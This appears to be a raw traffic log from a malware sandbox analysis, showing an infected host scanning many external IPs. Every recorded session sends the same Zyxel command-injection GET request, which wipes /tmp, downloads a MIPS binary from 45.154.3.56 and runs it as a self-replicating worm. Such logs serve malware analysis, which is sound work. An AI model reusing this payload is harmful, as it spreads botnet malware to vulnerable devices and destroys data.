                        Mar 12, 2024 08:50:26.019187927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        606192.168.2.145659479.169.77.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019256115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        607192.168.2.145314844.40.100.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019330978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        608192.168.2.144425081.4.235.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019398928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        609192.168.2.1460312112.141.184.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019462109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        610192.168.2.1433834169.126.180.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019536972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        611192.168.2.144275627.159.55.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019594908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        612192.168.2.144476247.143.51.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019646883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        613192.168.2.144933664.135.5.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019701958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        614192.168.2.1439584102.87.19.93443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019767046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        615192.168.2.145601639.186.102.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019812107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        616192.168.2.144788047.107.134.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019849062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        617192.168.2.1453516134.99.241.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019893885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        618192.168.2.1439946223.37.252.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.019942999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        619192.168.2.1448036188.125.74.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020015955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        620192.168.2.1455368213.206.226.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020103931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        621192.168.2.144477850.23.162.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020189047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        622192.168.2.1442312186.46.252.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020245075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        623192.168.2.1436296180.146.47.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020298958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        624192.168.2.1450700191.157.150.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020380020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        625192.168.2.1443604102.254.141.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020417929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        626192.168.2.1446680145.200.248.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020448923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        627192.168.2.143991284.227.0.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020528078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        628192.168.2.1451774107.217.231.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020608902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        629192.168.2.1447642156.71.58.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020665884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        630192.168.2.1452898188.76.154.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020710945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        631192.168.2.1443844200.94.64.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020772934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        632192.168.2.146045263.73.105.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020826101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        633192.168.2.1443246184.85.109.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020903111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        634192.168.2.145606663.141.196.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.020941973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        635192.168.2.144265654.251.119.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021003008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        636192.168.2.145201425.94.69.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021039009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        637192.168.2.146080852.46.13.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021115065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        638192.168.2.146029871.138.139.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021153927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        639192.168.2.145799099.202.150.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021224976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        640192.168.2.1446008161.104.142.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021270990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        641192.168.2.1457150194.226.20.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021323919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        642192.168.2.143696818.110.95.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021372080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        643192.168.2.1435182217.116.158.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021429062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        644192.168.2.1442936216.244.191.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021476984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        645192.168.2.145445414.210.108.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021537066 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        646192.168.2.1456034117.85.160.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021596909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        647192.168.2.1458826122.217.163.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021653891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        648192.168.2.1451356143.31.43.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021724939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        649192.168.2.1438132155.3.252.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021786928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        650192.168.2.144708473.90.225.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021843910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        651192.168.2.14471084.43.227.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021917105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        652192.168.2.1434250158.117.11.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.021927118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        653192.168.2.1458594186.75.236.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022006989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        654192.168.2.1437908212.39.249.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022051096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        655192.168.2.1446146135.105.25.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022084951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        656192.168.2.1449350148.115.92.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022138119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        657192.168.2.143282225.187.117.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022195101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        658192.168.2.145498273.200.99.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022249937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        659192.168.2.1458860100.246.5.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022315025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        660192.168.2.1452042100.218.173.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022365093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        661192.168.2.145207699.160.3.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022449970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        662192.168.2.144378085.158.102.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022497892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        663192.168.2.145638847.135.201.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022547007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        664192.168.2.144443832.97.24.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022614002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        665192.168.2.1439482213.209.183.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022670031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        666192.168.2.14508908.211.178.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022720098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        667192.168.2.1440104145.191.42.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022783041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        668192.168.2.143582485.222.238.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022840023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        669192.168.2.1436804123.70.29.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022928953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        670192.168.2.1456484164.68.28.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.022980928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        671192.168.2.1443078205.17.60.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023046970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        672192.168.2.1441818137.31.43.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023104906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        673192.168.2.14405002.63.116.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023164988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        674192.168.2.1453686111.50.117.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:26.023221970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        675192.168.2.145771247.22.59.152443
                        TimestampBytes transferredDirectionData
